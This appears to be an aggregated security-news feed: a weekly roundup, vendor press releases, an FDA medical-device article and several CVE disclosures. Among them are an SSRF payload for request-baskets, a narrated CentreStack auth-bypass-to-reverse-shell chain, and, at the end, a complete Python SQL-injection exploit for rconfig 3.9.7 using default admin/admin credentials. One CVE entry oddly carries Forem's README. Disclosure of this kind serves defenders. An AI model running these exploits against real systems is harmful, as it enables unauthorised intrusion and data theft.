Plus: A major new supply chain attack, Biden’s spyware executive order, and a hacking campaign against Exxon’s critics.

Did you hear that Donald Trump got indicted this week? Of course you did. Ridiculous question. The first-ever indictment of a former US president had been looming for weeks. And now that it's happened, the move by a Manhattan grand jury is deepening fissures in America's already-fraught political divide. But while Trump headlines flood your feeds, there were plenty of other big stories this week, none of which have anything to do with any of _that_. 

In Germany, police are cracking down on people who post adult content to websites and platforms that lack age-verification checks, like Twitter. This has resulted in fines and threats of jail time, while some performers are deleting their accounts—or fleeing the country. This is just one of the impacts of a wave of age-verification laws sweeping the global internet.

Meanwhile, in darker corners of the internet, North Korea–backed hackers are using a rare technique to launder their stolen cryptocurrencies: paying to mine clean crypto with loot taken from their victims. The tactic is meant to throw blockchain detectives off the trail of swiped funds. Speaking of ill-gotten gains, Costa Rica is still reeling from a series of ransomware attacks last spring that left swaths of the country's infrastructure devastated. As a result, the US government is sending $25 million in aid to help it recover. 

Most victims of cyberattacks don't get help from the US government, however. Fortunately for them, this week Microsoft announced its new system, Security Copilot, which integrates OpenAI's ChatGPT and home-grown artificial intelligence to help incident responders managed breaches. Of course, the best way to protect yourself from getting hacked is to make sure all your systems are fully patched and up to date.

To top it all off, this week we revealed new documents obtained through a public records request which show that Good Smile, a major toy company that creates figurines for companies like Disney, invested $2.4 million in the toxic imageboard 4chan, helping to keep the company online.

But that's not all. Each week, we dive into the stories we weren't able to report on ourselves. Click on the headlines to read the full stories. And stay safe out there.

The Russian government and military remain the most aggressive in the world when it comes to disruptive acts of cyber-sabotage against civilian infrastructure. But documents leaked by a whistleblower inside a Russian intelligence contractor seem to reveal some new and alarming pages of the Kremlin’s hybrid war playbook.

A consortium of investigative journalists at 11 news outlets including Paper Trail Media, _The Guardian_, and _The Washington Post_ obtained a leak of secret documents from a Russian cybersecurity contractor firm called Vulkan, the Russian word for _volcano_. The documents, which were also analyzed by cybersecurity firm Mandiant, reveal that Vulkan sold software tools to Russian intelligence agencies like the KGB-successor FSB and the GRU military intelligence agency, including its notorious cyberattack-focused team known as Sandworm. 

The tools include one piece of software for scanning the internet for security vulnerabilities and another that seemed designed to organize disinformation campaigns and coordinate offensive hacking operations. Perhaps most disturbing of all was a proposal for a third tool that appeared to be designed to allow hackers to train in simulated networks of infrastructure systems like railways and pipelines, with specific references to methods to sabotage those systems with catastrophic effects. But it’s not clear whether that last tool was ever built, and if so, whether it was used primarily for offensive hacking or “red team” defensive training, or whether it led to the development of any actual hacking capabilities targeting critical infrastructure.

Security experts say North Korea–linked hackers have successfully carried out a supply chain attack through compromised versions of 3CX, a video and voice communications platform used by high-profile companies including American Express and Mercedes-Benz. 3CX says it has more than 600,000 customers. The hackers were able to install malware within the Mac and Windows versions of 3CX, which were signed with the company's keys, thus allowing the Trojanized apps to go undetected. The attack is being compared to Russian hackers' SolarWinds supply chain attack, which wrought havoc around the world for months. 

As hacker-for-hire firms' tools proliferate to governments around the world, the Biden administration has made clear: The US will not be one of that industry's customers. A new executive order bans US agencies from buying access to that commercial spyware, a key step in a growing effort to curb companies like NSO Group, Cytrox, and Candiru, which have enabled surveillance and human rights abuses from Spain to Mexico to Saudi Arabia. US agencies haven't been confirmed to be past customers of any of those companies, though the FBI did at one point test NSO's Phantom spyware before ultimately walking away from a deal with the company. But the order nonetheless sets a precedent for governments worldwide, assuring that US taxpayer funds won't flow to a dangerous industry whose tools have offered intrusive hacking techniques to repressive regimes targeting activists, journalists, and human rights defenders.

While we're on the subject of dangerous hacker-for-hire firms targeting vulnerable activists: The _Wall Street Journal_ reported this week that Indian hacker-for-hire firm BellTroX targeted climate change activists campaigning against Exxon, including Greenpeace, Public Citizen, 350.org, and the Rockefeller Family Fund. The firm was hired by Israeli private detective Aviram Azari, who has since pleaded guilty to hacking conspiracy charges. Exactly who hired Azari remains unclear, and Exxon denies having any connection to Azari or the hacking campaign. The hackers successfully accessed email accounts for Greenpeace, Public Citizen, and 350.org, but it's not yet clear whether they successfully penetrated the Rockefeller Family Fund, an organization created by Rockefeller heirs that has worked to combat the oil industry's efforts to lobby against climate change solutions.

‘Vulkan’ Leak Offers a Peek at Russia’s Cyberwar Playbook

Launching CSPM, container workload security, and cloud vulnerability management to modernize cloud security operations.

**MOUNTAIN VIEW, Calif.--(****BUSINESS WIRE****)--** Elastic (NYSE: ESTC) (“Elastic”), the company behind Elasticsearch, today announced expanded capabilities for Elastic Security including Cloud Security Posture Management (CSPM) for AWS, container workload security, and cloud vulnerability management. Building on the previously released Kubernetes security posture management (KSPM) and Cloud Workload Protection Platform (CWPP) capabilities, Elastic now delivers a comprehensive security analytics solution that includes complete Cloud Native Application Protection for AWS.

According to Gartner, more than 85% of organizations are moving to a cloud-first model and 95% of new digital workloads are being deployed on cloud-native platforms. However, 99% of cloud failures will be the customer’s fault due to mistakes like cloud misconfigurations. Research from Elastic Security Labs found that nearly 1 in 3 (33%) attacks in the cloud leverage credential access, indicating that users often overestimate the security of their cloud environments and fail to configure and protect them adequately.

“Many companies have a fragmented approach to cloud security, as security and devops teams pivot between multiple dashboards,” said **Ken Buckler, Research Analyst - Security and Risk Management, Enterprise Management Associates.** “Unified visibility across all cloud resources, as well as on-premises systems, is critical to quickly identify and stop security threats at scale, especially when attackers repeatedly cross boundaries between cloud and on-premise in attempts to evade detection. With Elastic Security, organizations can streamline their cloud security operations by establishing real-time, unified visibility across their environments in a single interface.”

Elastic’s comprehensive suite of cloud security capabilities includes:

*   **Cloud Workload Protection** (generally available) — Expands on existing runtime security for traditional endpoints, enabling cloud security teams to gain deep visibility into the entire runtime workload including standalone Linux workloads, virtual machines, and infrastructure hosted in AWS, Google Cloud, and Microsoft Azure.
*   **Container Workload Protection** (beta) — Provides cloud security teams deep visibility into container workloads in managed Kubernetes environments with pre-execution runtime analysis for workloads running in Amazon EKS, GKE, and AKS environments.
*   **Cloud Security Posture Management** (beta) — Enables cloud security teams to continuously detect and remediate misconfigurations across workloads in AWS and Amazon EKS in real-time with Center for Information Security (CIS) benchmark controls, out-of-the-box integrations, and posture management dashboards and reports.
*   **Cloud Vulnerability Management** (beta) — Uncovers cloud-native vulnerabilities in AWS EC2 workloads with minimal resource utilization on workloads and enumerating vulnerabilities with risk context to help cloud security teams identify and respond to potential risk.

“Elastic Security is a unified security solution offering SIEM, endpoint, and cloud security capabilities—rooted in data management and analytics—that enables customers to protect, investigate and respond to threats across their entire infrastructure,” said **Santosh Krishnan, General Manager of Elastic Security, Elastic**. “The expansion of Elastic Security’s comprehensive cloud security capabilities provides organizations with the power they need to modernize their cloud security operations, improve attack surface visibility, reduce vendor complexity, and accelerate remediation.”

For more information, read the blog.

Gartner Press Release, "Gartner Says Cloud Will Be the Centerpiece of New Digital Experiences," November 10, 2021.

**About Elastic:**

Elastic (NYSE: ESTC) is a leading platform for search-powered solutions. We help organizations, their employees, and their customers accelerate the results that matter. With solutions in Enterprise Search, Observability, and Security, we enhance customer and employee search experiences, keep mission-critical applications running smoothly, and protect against cyber threats. Delivered wherever data lives, in one cloud, across multiple clouds, or on-premise, Elastic enables 19,900+ customers and more than half of the Fortune 500, to achieve new levels of success at scale and on a single platform. Learn more at elastic.co.

The release and timing of any features or functionality described in this document remain at Elastic’s sole discretion. Any features or functionality not currently available may not be delivered on time or at all.

_Elastic_ and associated marks are trademarks or registered trademarks of Elastic N.V. and its subsidiaries. All other company and product names may be trademarks of their respective owners.

Elastic Expands Cloud Security Capabilities for AWS

The physical and cyber safety issues surrounding medical devices like IV pumps is finally being meaningfully addressed by a new policy taking effect this week.

The Food and Drug Administration (FDA) this week put into effect fresh guidance concerning the cybersecurity of medical devices — long a concerning area of risk for healthcare organizations and patients alike. The policy is one in a long line of attempts by the FDA to put some guardrails around the susceptibility of things like insulin pumps and heart monitors to hacking, and experts say that this time, the FDA's move might actually make a difference.

Effective immediately, medical device manufacturers are advised to submit "a plan to monitor, identify, and address, as appropriate, in a reasonable time, postmarket cybersecurity vulnerabilities, and exploits."

Manufacturers are also asked to "design, develop, and maintain processes and procedures to provide a reasonable assurance that the device and related systems are cybersecure." This includes making patches available "on a reasonably justified regular cycle," and for newfound critical vulnerabilities, "as soon as possible out of cycle."

And finally, the FDA is asking that new devices come prepared with a software bill of materials (SBOM).

For some, FDA guidance may evoke memories of prior actions that failed to improve cybersecurity in this critical area in any real way. But experts say this long road has finally reached a real, genuine inflection point. Starting now, new medical devices that don't meet these standards will be blocked from the market.

"It's actually been a process that's taken place over approximately the last 10 years," says Cybellum CMO David Leichner. "And it came to fruition two days ago."

**Medical Devices in Cyber-Crisis**

Medical device security has been an alarmingly lagging area for cybersecurity for a very long time, and there's a laundry list of reasons why. Healthcare facilities often use legacy IT and have flat networks that aren't segmented, for instance — even as medical devices for patients are increasingly connected. And security by design isn't common.

"A medical device manufacturer may be very experienced in designing highly reliable and innovative devices, but they may not necessarily be security experts," explains Axel Wirth, chief security strategist at MedCrypt.

In fact, the most cutting-edge medical equipment sometimes introduces new security problems that the old stuff never had. Internet connectivity brings a slew of benefits to providers, but also opportunities for hackers. In the State of Healthcare IoT Device Security 2022 report, healthcare IoT firm Cynerio found that more than half of all connected medical devices are vulnerable, including, for example, nearly three out of every four IV pumps.

Thus, cybercriminals can easily break in and run rampant across a hospital network, reaching whatever endpoints they choose, including these life-saving devices. This could have potential physical consequences for patients if a device is vulnerable to takeover by an unauthorized user. The risk isn't theoretical: A September 2022 report by Proofpoint's Ponemon Institute linked a 20% increase in mortality rates to cyberattacks targeting healthcare organizations.

This is all exacerbated by the fact that when bugs are discovered, device manufacturers have a terrible track record of issuing patches in a timely manner (as is the case for most IoT gear), and healthcare settings have an even more terrible track record of implementing them.

"One reason \[for the insecurity\] is that these devices live longer," Wirth points out. Because they're designed to last a while — which is otherwise a positive thing — "they may be outdated or running outdated software, and any operational technology (OT) that is not necessarily up to date is more difficult to maintain. It's more difficult to deploy patches; it's more difficult to find time during hospital operations to update the device."

Considering the ubiquity of security failures in the industry, coupled with the massive consequences at stake in the event of a breach, many have urged the government to do more than offer "suggestions" for addressing the problems.

**The FDA's New Teeth**

On Dec. 29, President Biden signed into law the Consolidated Appropriations Act, also known as the Omnibus bill, which included Section 3305 — "Ensuring cybersecurity of medical devices" — an amendment to the Federal Food, Drug, and Cosmetic Act. It took effect on Thursday, 90 days after the Omnibus' passing.

So what happens now? It takes time for manufacturers to change their processes and for new products to integrate new rules and regulations (to say nothing of how healthcare, in general, moves more slowly than other industries, by necessity). The FDA has arranged for a six-month window — until Oct. 1 — for manufacturers to get used to the new rules of the road.

From now until then, the FDA will "work collaboratively" with manufacturers to ensure compliance, the agency clarified in an accompanying notice. Once Oct. 1 hits, "FDA expects that sponsors of such cyber devices will have had sufficient time to prepare." At that point, they will begin issuing "refuse to accept" (RTA) decisions to prevent any devices that don't meet the stated standards from reaching the market.

"Manufacturers are asking: 'When does this hit us?,'" Naomi Schwartz, MedCrypt's senior director of cybersecurity quality and safety, explains. "And the FDA is clarifying: 'We're not going to start refusing to accept until October, so that you have time to update all of your documentation and relieve a little bit of pressure and fear. But no kidding, you guys better get your stuff ready in the next six months, because it's coming.'"

What remains to be seen is how the FDA will enforce its rules after a device is released to the public. Preventing a machine from reaching hospitals is one thing, but ensuring that vendors meet so many of the other requirements outlined in these guidelines — like regular monitoring, consistent patching, and responsible vulnerability disclosure — requires never-ending oversight.

"This is definitely going to increase the overhead of the FDA," Cybellum's Leichner figures. "It'll be interesting to see how they go about this."

**The Timeline for Real, Visible Change**

Even once manufacturers start turning out gear that's in compliance with the policy, an overhaul of healthcare device cybersecurity will take a while.

"Medical devices can be very pricey," Wirth points out, "and replacing medical devices in hospitals requires budget, requires training. Sometimes it requires even changes in building and infrastructure. So it'll take a number of years." Section 3305 assigns no deadline for healthcare providers to replace their existing legacy equipment.

Still, he says, "I think we are already seeing better secure devices arrive in the market," especially since the US isn't the only place to start demanding security hardening of the devices.

Even though the FDA's policy might take a while to bear real fruit (and it's too soon to know for certain), we may look back on 2023 as a watershed for the industry.

"This is going to help FDA staff, it's going to help the industry, it's going to motivate people to stop kicking the can down the road and start buckling down now," MedCrypt’s Schwartz concludes. "It's pretty cool."

The FDA's Medical Device Cybersecurity Overhaul Has Real Teeth, Experts Say

The State of Email Security Report reveals cyber risk commands the C-suite's focus.

**DUBAI****, UAE****,** **March 31, 2023** **/PRNewswire/ --** Mimecast, an advanced email and collaboration security company, today announced the publication of its annual "The State of Email Security 2023" (SOES) report. The global survey is based on responses from 1,700 IT and security decision-makers, providing readers with key takeaways on the current threat landscape and offering recommendations to help organizations improve their cybersecurity posture.

Download the full report – Mimecast's "The State of Email Security 2023"

The global report sheds light on the threats affecting companies across the globe, including the United Arab Emiratesand Saudi Arabia. Ninety four of respondents from the UAE and 100% from Saudi Arabia  reported to have been targeted by emailed-based phishing attacks in the last year, but they all said that they either have a system to monitor and protect against email-borne threats or are actively planning to roll one out.

**Highlights From This Year's Report** 

**Cyber awareness in the C-suite –** As cyberattacks continue to become more sophisticated, business leaders in the region have shown greater willingness to confront the risks involved and invest in proper measures to keep cyberattacks at bay. On average, 95% of companies in the UAE and Saudi Arabia reported needing stronger protection for their Microsoft 365 and Google Workspace applications, while 61% said their company needs to spend more on cybersecurity. However, all companies reported some form of cyber awareness training at their workplace, thus indicating a greater alertness to future attacks. With the increased focus on cyber preparedness by the C-suite, CISOs feel more empowered to articulate their requirements and implement strategies and tactics that will make their organization more secure.  

**Collaboration tools, essential but risky –** With workforces still divided between the office and remote locations, collaboration tools remain an essential yet risky part of communicating with team members. Eighty four percent of SOES participants in UAE and as many as 94% in Saudi Arabia agree that collaboration tools like Microsoft Teams or Slack are essential to their working function, but 82% from both countries expect to be harmed in 2023 by a collaboration-tool-based attack. The sharp increase in the use of these tools puts it directly in the minds of CISOs to ensure that adequate security measures are put in place for them to continue working protected while using them.

**Improved cyber preparedness –** There is a growing realization that cyber risk isn't just an IT problem — it's a critical vulnerability that directly equates to overall business risk. As such, organizations are taking the necessary measures to prepare for impending attacks.   Half are using artificial intelligence and machine learning to help under-resourced teams stay ahead of the curve, while the other half have plans to implement such measures. The use of AI tools will undoubtedly help under-resourced cybersecurity teams stay ahead of attacks and manage threats accordingly. Sixty four percent of Saudi Arabian respondents cited threat prevention as the top benefit of implementing AI, while 54% of organisations in UAE said reduced human error across the company was the biggest advantage. Overall, most companies believe that AI systems will help revolutionize the ways in which cybersecurity is practiced.

"Supply chain vulnerabilities, the rise of online collaboration and the growth of digital networking are among the chief reasons the cyber landscape is becoming more treacherous. The intersection of communications, people, and data carries a tremendous amount of risk, as malicious actors exploit the interconnectedness of the modern work surface," says Werno Gevers, regional leader of Mimecast Middle East. "Our research shows that corporate boards have finally woken up to the realisation that cyber risk is business risk, so it's time for CISOs to make the case for increased budgets and greater cyber resiliency."

Download the full report and view the UAE and Saudi Arabia infographics to learn more, and stay tuned to the Mimecast blog Cyber Resilience Insights_._

**Mimecast: Work Protected™**  

Since 2003, Mimecast has stopped bad things from happening to good organizations by enabling them to work protected. We empower more than 40,000 customers to help mitigate risk and manage complexities across a threat landscape driven by malicious cyberattacks, human error, and technology fallibility. Our advanced solutions provide the proactive threat detection, brand protection, awareness training, and data retention capabilities that evolving workplaces need today. Mimecast solutions are designed to transform email and collaboration security into the eyes and ears of organizations worldwide.  

_Mimecast, the Mimecast logo, and Work Protected are either registered trademarks or trademarks of Mimecast Services Limited in_ the United States _and/or other countries.  All rights reserved.  All other third-party trademarks and logos contained in this press release are the property of their respective owners._

SOURCE Mimecast

Mimecast Report Reveals Nearly 60% of Companies in UAE and Saudi Arabia Need to Increase Cybersecurity Spending

request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.

\# request-baskets SSRF details Follow the official documentation to start forem with docker installation. !\[\](https://notes.sjtu.edu.cn/uploads/upload\_f37294d56f74b588fac26542b22f7624.png) Then, we log in to the administrator background: !\[\](https://notes.sjtu.edu.cn/uploads/upload\_5fa5fdd0cd07c6d78a8e34f54c839f3d.png) The following API's forward\_url parameter is vulnerable to SSRF： 1. /api/baskets/{name} 2. /baskets/{name} Let's take /api/baskets/{name} API as an example, another API is the same vulnerability. We use the following payload to post /api/baskets/{name} API： \`\`\` { "forward\_url": "http://127.0.0.1:80/test", "proxy\_response": false, "insecure\_tls": false, "expand\_path": true, "capacity": 250 } \`\`\` !\[\](https://notes.sjtu.edu.cn/uploads/upload\_2f8962255d21885cb2c34b95a1baa801.png) Direct post can only set the url, you need to visit the url - http://192.168.175.213:55555/test to trigger the SSRF vulnerability. !\[\](https://notes.sjtu.edu.cn/uploads/upload\_8371c9701d7823878b9cc0cb4a6d44b4.png) # Influence： \*\*Information Disclosure and Exfiltration\*\* This was previously identified as an issue. Requests for images that are unauthenticated can lead to the leak of all existing images in the server. However, this isn't limited to just images. Any resource that can be obtained via an HTTP request on the local network of the webserver can be obtained remotely via this request. \*\*Unauthenticated Access to Internal Network HTTP Servers\*\* The SSRF attack can be leveraged to connect to any HTTP Server connected to the same network as the request-baskets server, for instance an Nginx server exposed only internally, an internal RESTful API, such as a NoSQL database, or a GraphQL database. This is not limited just to services hosted on the local machine, but all the machines connected on the local network. \*\*Port and IP Scanning and Enumeration\*\* This vulnerability can be leveraged to port scan for HTTP servers both internal and external services on demand, as well as enumerating all the machines in the local network that have open HTTP ports.

CVE-2023-27163: request-baskets SSRF details - CodiMD

openapi-generator up to v6.4.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/gen/clients/{language}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.

\# openapi-generator API SSRF details When we tested the official demo website of openapi-generator, we found SSRF vulnerabilities in the following APIs, which proves that openapi-generator also has this SSRF vulnerability. The following API's openAPIUrl parameter is vulnerable to SSRF: 1. /api/gen/clients/{language} 2. /api/gen/servers/{framework} Let’s take /api/gen/clients/{language} API as an example, another API is the same vulnerability. We modify the original API request parameters, here we use dnsLog to verify the existence of SSRF vulnerabilities. !\[\](https://notes.sjtu.edu.cn/uploads/upload\_27041c70c32fc6630d4507d38436e91b.png) The dnslog records are as follows： !\[\](https://notes.sjtu.edu.cn/uploads/upload\_6593542e6d7d269dbbd1e48c39e785ec.png) This confirms the existence of the SSRF vulnerability. # Influence： \*\*Information Disclosure and Exfiltration\*\* This was previously identified as an issue. Requests for images that are unauthenticated can lead to the leak of all existing images in the server. However, this isn't limited to just images. Any resource that can be obtained via an HTTP request on the local network of the webserver can be obtained remotely via this request. \*\*Unauthenticated Access to Internal Network HTTP Servers\*\* The SSRF attack can be leveraged to connect to any HTTP Server connected to the same network as the openapi-generator server, for instance an Nginx server exposed only internally, an internal RESTful API, such as a NoSQL database, or a GraphQL database. This is not limited just to services hosted on the local machine, but all the machines connected on the local network. \*\*Port and IP Scanning and Enumeration\*\* This vulnerability can be leveraged to port scan for HTTP servers both internal and external services on demand, as well as enumerating all the machines in the local network that have open HTTP ports.

CVE-2023-27162: openapi-generator API SSRF details - CodiMD

forem up to v2022.11.11 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /articles/{id}. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.

  
**Forem 🌱**

**For Empowering Community**

   

Welcome to the Forem codebase, the platform that powers dev.to. We are so excited to have you. With your help, we can build out Forem’s usability, scalability, and stability to better serve our communities.

**What is Forem?**

Forem is open source software for building communities. Communities for your peers, customers, fanbases, families, friends, and any other time and space where people need to come together to be part of a collective. See our announcement post for a high-level overview of what Forem is.

dev.to (or just DEV) is hosted by Forem. It is a community of software developers who write articles, take part in discussions, and build their professional profiles. We value supportive and constructive dialogue in the pursuit of great code and career growth for all members. The ecosystem spans from beginner to advanced developers, and all are welcome to find their place within our community. ❤️

**Table of Contents**

*   What is Forem?
*   Table of Contents
*   Community
*   Contributing
*   Getting Started
    *   Prerequisites
        *   Local
        *   Containers
    *   Installation Documentation
*   Developer Documentation
*   Core team
*   Vulnerability disclosure
*   Acknowledgements
*   License

**Community**

For a place to have open discussions on features, voice your ideas, or get help with general questions please visit our community at forem.dev.

**Contributing**

We encourage you to contribute to Forem! Please check out the Contributing to Forem guide for guidelines about how to proceed.

**Getting Started**

This section provides a high-level quick start guide. If you're looking for a more thorough installation guide (for example with macOS, you'll want to refer to our complete Developer Documentation.

We run on a Rails backend, and we are currently transitioning to a Preact\-first frontend.

A more complete overview of our stack is available in our docs.

To **launch Forem in Gitpod**, navigate to https://gitpod.io/#https://github.com/{your\_github\_username}/forem.

**Prerequisites****Local**

*   Ruby: we recommend using rbenv to install the Ruby version listed on the badge.
*   Yarn 1.x: please refer to their installation guide.
*   PostgreSQL 11 or higher.
*   ImageMagick: please refer to ImageMagick's installation instructions.
*   Redis 4 or higher.

**Containers**

**Linux**

*   Podman 1.9.2 or higher
*   Podman Compose 0.1.5 or higher

**OS X**

*   Docker Desktop for Mac

**Installation Documentation**

Please see our installation guides, such as the one for macOS.

**Developer Documentation**

Check out our dedicated docs page for more technical documentation.

**Core team**

*   @benhalpern
*   @jessleenyc
*   @peterkimfrank
*   @maestromac
*   @lightalloy
*   @ridhwana
*   @rt4914
*   @jaw6
*   @lboogie2004
*   @klardotsh

**Vulnerability disclosure**

Forem is the open source software which powers DEV.

We welcome security research on DEV under the terms of our vulnerability disclosure policy.

**Acknowledgements**

Thank you to the Twemoji project for the usage of their emojis.

**License**

This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Please see the LICENSE file in our repository for the full text.

Like many open source projects, we require that contributors provide us with a Contributor License Agreement (CLA). By submitting code to the Forem project, you are granting us a right to use that code under the terms of the CLA.

Our version of the CLA was adapted from the Microsoft Contributor License Agreement, which they generously made available to the public domain under Creative Commons CC0 1.0 Universal.

Any questions, please refer to our license FAQ doc or email yo@dev.to.

  
**Happy Coding** ❤️

⬆ Back to Top

CVE-2023-27160: GitHub - forem/forem: For empowering community 🌱

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 24 and March 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for March 24 to March 31

An authentication bypass vulnerability in the Password Reset component of Gladinet CentreStack before 13.5.9808 allows remote attackers to set a new password for any valid user account, without needing the previous known password, resulting in a full authentication bypass.

White Oak Security discovered an instance of Gladinet’s CentreStack server which was vulnerable to an authentication bypass and an arbitrary file upload resulting in remote code execution.

This issue has been remediated as of release 13.5.9808 – June 13, 2022 (1). These issues were tracked as S-8238.

**CentreStack Vulnerability Disclosure Timeline**

White Oak Security (WOS) followed responsible disclosure guidelines by giving Gladinet time to remediate this vulnerability and allow customers ample time to patch their instances. Once we were able to establish contact with Gladinet, we appreciated their quick response to remediating the reported issues.

**4/16/22**: Attempted to contact Gladinet via online support ticket.

**4/22/22**: Second attempt to contact Gladinet via online support ticket.

**5/10/22**: Attempted to contact Gladinet via generic cold email methods.

**5/12/22**: Successfully contacted Gladinet via customer support phone number and follow-up emails.

**5/16/22**: Vulnerabilities disclosed to Gladinet via online support ticket.

**6/13/22**: Patch made available by Gladinet, identified by ID S-8238.

**2/2/23:** White Oak Security publicly discloses the finding according to our vulnerability disclosure policy.

**CentreStack**

CentreStack is an on-premise solution that provides file share, backup services, and remote file access which can be managed by a web application.

**CentreStack Exposure**

Using Shodan, the CentreStack web server can be found exposed on the internet on a handful of servers. 

**Analysis: Unauthenticated Password Reset**

White Oak Security identified an access control violation where unauthenticated attackers can access the change password controller and, without providing the original user account password, force an update for an existing user account. The result is a full authentication bypass which allows a malicious user to gain access to an administrator account.

As a demonstration, an invalid login attempt for the account admin@test.com was performed using the password: “fakepassword!.

The application denies the login request as expected due to an invalid password:

Next, the unauthenticated malicious actor forcefully navigates to the password reset application page. A form is created which prompts the user to attempt a password reset.

The malicious actor intercepts this request, modifies the hfTicket value to contain a username, in this case, the victim user admin@test.com, and sets a new password for the account “fakepassword!”.

The application successfully processes this request:

Lastly, the malicious actor once again navigates to the main login page and attempts to login as the admin@test.com user with the newly forced password.

The application successfully authenticates the user since the account password had been changed, and the malicious actor gains the permissions of any account that had been reset, in this case, full administrative privileges.

**Analysis: Unrestricted File Upload**

Now that White Oak Security established a valid authentication bypass, WOS focused its efforts on obtaining code execution. An unrestricted file upload vulnerability was discovered within the Cluster and Tenant branding functionality, accessible by an administrator of the application. When chained together with an abuse of the Anti-Virus engine, the result is code execution. 

The branding image upload functionality does not limit what file types that can be uploaded to the server, which allows a malicious actor to upload a custom executable file. In this example, a reverse shell binary is uploaded in the Logo handler:

Once the binary has been uploaded, the application reveals a broken image as expected since the content is not actually an image indicating that our upload has been successful:

Upon inspecting the network traffic, we can see that the download for the logo image does return the binary program:

In order to achieve command execution, the full path of the uploaded image is required in order to be exploited with the Anti-Virus engine. On the filesystem, we can observe that a random GUID has been created within the **C:/CentreStack** directory.

While this GUID is random, the GUID can be leaked by interacting with the local file image editor or local application editor with any uploaded file:

The network traffic for this request leaks the full GUID in the LocalEditPage.aspx application response:

Next, the filename of the raw binary also contains a GUID with a fixed name “Brand\_LogoImg” appended to the GUID that is generated.

However, this value is simply the **_y-glad-brid_** session value which can easily be found throughout any authenticated request:

Now that the full path of the uploaded binary has been discovered through the application’s own components, the Anti-Virus engine scanner location can be modified to the full path of the binary:

Since the Anti-Virus engine does not limit the path of the potential programs that can be executed, any arbitrary binary on the system can be executed as the Anti-Virus engine.

Lastly, a malicious actor simply has to upload any file to the CentreStack server which will trigger the Anti-Virus scan to execute and run the custom binary:

On the attacker-controlled machine, the reverse shell is executed and a successful connection is observed. The process is additionally being executed with the highest permissions of **NT AUTHORITY\\SYSTEM**.

Upon inspecting the executing processes on the server with ProcessExplorer (2), the execution path is observed as the **GladinetCloudMonitor.exe** service executing the binary as NT AUTHORITY\\SYSTEM compared to the web server permissions of IIS APPPOOL. This is due to the Anti-Virus programs requiring a higher permission to scan local files, however, this gains an attacker full administrative privileges over the underlying server.

While the unrestricted file upload vulnerability was used to upload arbitrary files to the server, White Oak Security could have alternatively uploaded a malicious file to the server using the built-in file storage mechanism, and simply pointed the Anti-Virus engine to execute that program and obtain a shell in that fashion. 

However, it was more interesting to identify a vulnerability rather than built-in functionality to chain together this attack path.

****More From White Oak Security****

White Oak Security is a highly skilled and knowledgeable cyber security and penetration testing company that works hard to get into the minds of opponents to help protect those we serve from malicious threats through expertise, integrity, and passion.

Read more from White Oak Security’s pentesting team.

****Sources****

1\. https://www.centrestack.com/p/gce\_latest\_release.html – CentreStack Release History

2\. https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer – ProcessExplorer

CVE-2023-26829: CentreStack Vulnerability Disclosure | White Oak Security

rconfig version 3.9.7 suffers from a remote SQL injection vulnerability.

    # Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)# Exploit Author: azhen# Date: 10/12/2022# Vendor Homepage: https://www.rconfig.com/# Software Link: https://www.rconfig.com/# Vendor: rConfig# Version: <= v3.9.7# Tested against Server Host: Linux# CVE: CVE-2022-45030import requestsimport sysimport urllib3urllib3.disable_warnings()s = requests.Session()# sys.argv.append("192.168.10.150") #Enter the hostnameif len(sys.argv) != 2:    print("Usage: python3 rconfig_sqli_3.9.7.py <host>")    sys.exit(1)host=sys.argv[1] #Enter the hostnamedef get_data(host):    print("[+] Get db data...")    vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"    query_exp = "database()"    result_data = ""    for i in range(1, 100):        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}        res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)        # print(res.text)        a = chr(int(res.text[6:10]) - 1000)        if a == '\x00':            break        result_data += a                print(result_data)        print("[+] Database name: {}".format(result_data))    '''    output:    [+] Logging in...    [+] Get db data...    r    rc    rco    rcon    rconf    rconfi    rconfig    rconfigd    rconfigdb    [+] Database name: rconfigdb            '''def login(host):    print("[+] Logging in...")    url = "https://"+host+":443/lib/crud/userprocess.php"    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}        data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin    response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)    get_data(host)login(host)

Tag

#mac